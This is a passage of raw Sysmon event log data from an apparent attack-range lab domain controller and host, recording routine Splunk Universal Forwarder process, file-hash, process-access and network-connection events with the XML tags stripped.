Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C20A162D100924EA175BDDE794E1DD48,SHA256=51BDBF2370CA440CFD8C76D0B9A69F9886935A6EC3855908DEDF142F56A49F28,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000296131Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:09:58.896{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B93AFA2746B0AACD6B3FBDC32D765355,SHA256=0792C482B103650400F5ECC25A08B198BF29457DE2775DB7B9F5BBAA3231D46F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220239Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:09:58.304{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4A0E2138833E20721F6F9CCB5E22EF99,SHA256=CB6AF39189086DA3DCA3972EE636C1FB5E22DFAE7D235C1B7162CAA8E86AB487,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220241Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:09:59.522{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=08ACED393EA371C178C93FEEDA33A6EF,SHA256=610102EA159FA25FD106D57A9AE85F69F807E0F10709C51778434265EE8FD8D6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000296132Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:09:59.911{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2823728BE546AFDC691CCECF2D1B4549,SHA256=69CD16B5BE26787F6B331BD230647F10AD88BDA2CA1D77F67F30EC611692D47A,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000220240Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:09:56.632{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51567-false10.0.1.12-8000- 23542300x8000000000000000296133Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:10:00.911{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4179750C74579053FAB528F0165B9080,SHA256=792BAA4CB8907A8406EA70B32728732457598DE1D6858EDAAF0043507D7F5562,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220242Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:10:00.569{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0599170B893776FE655BA03402AF70B4,SHA256=330F3F581A256B604B85D5382DC96BFB803B80D60E5F665B270C84C3B9821251,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000296143Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:10:01.935{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=47DC90A7BF6AD74490172359D62937F8,SHA256=F1E6858890DC204BF44C5F33DB65CE350FE0DD371A89ABCE716CF06FCF955BC3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220243Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:10:01.600{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EB71C0E9DA4018FE89CD503375762F30,SHA256=8A81EB98A908949D14C31C7A578499958147091B86A28C8A9C232E74EDE7D333,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000296142Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:10:01.550{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-1609-6216-E606-000000003802}6424C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296141Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:10:01.550{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296140Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:10:01.550{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296139Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:10:01.550{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296138Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:10:01.550{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296137Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:10:01.550{C8EA50B7-F11C-6215-0500-000000003802}412368C:\Windows\system32\csrss.exe{C8EA50B7-1609-6216-E606-000000003802}6424C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000296136Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:10:01.550{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-1609-6216-E606-000000003802}6424C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000296135Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:10:01.551{C8EA50B7-1609-6216-E606-000000003802}6424C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x8000000000000000296134Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:09:58.538{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49314-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000296153Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:10:02.954{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F2BB7A4E5AF10F3C44735203192E5A40,SHA256=F2D0412EC5A1A6B16F05D9A1B24C8D2AA079C6E901F85E01BD39394EB38745B0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220244Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:10:02.632{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=14109504349258B6D947FC29CB4CB21F,SHA256=18CC71E93436E2BADD74C687B3F19998E0B4734570E06830484DD3B7CE90B64A,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000296152Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:10:02.547{C8EA50B7-160A-6216-E706-000000003802}64166640C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296151Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:10:02.096{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-160A-6216-E706-000000003802}6416C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296150Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:10:02.080{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296149Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:10:02.080{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296148Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:10:02.080{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296147Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:10:02.080{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296146Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:10:02.080{C8EA50B7-F11C-6215-0500-000000003802}412368C:\Windows\system32\csrss.exe{C8EA50B7-160A-6216-E706-000000003802}6416C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000296145Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:10:02.080{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-160A-6216-E706-000000003802}6416C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000296144Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:10:02.083{C8EA50B7-160A-6216-E706-000000003802}6416C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000220245Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:10:03.788{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8115B1D637B4791F169202C10B556565,SHA256=9A99F07BB52F72FE6BE1164668E29C911E2C99CC564C1B2CDEE5D5805019CB63,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000296161Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:10:03.901{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-160B-6216-E806-000000003802}3164C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296160Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:10:03.901{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296159Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:10:03.901{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000296158Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 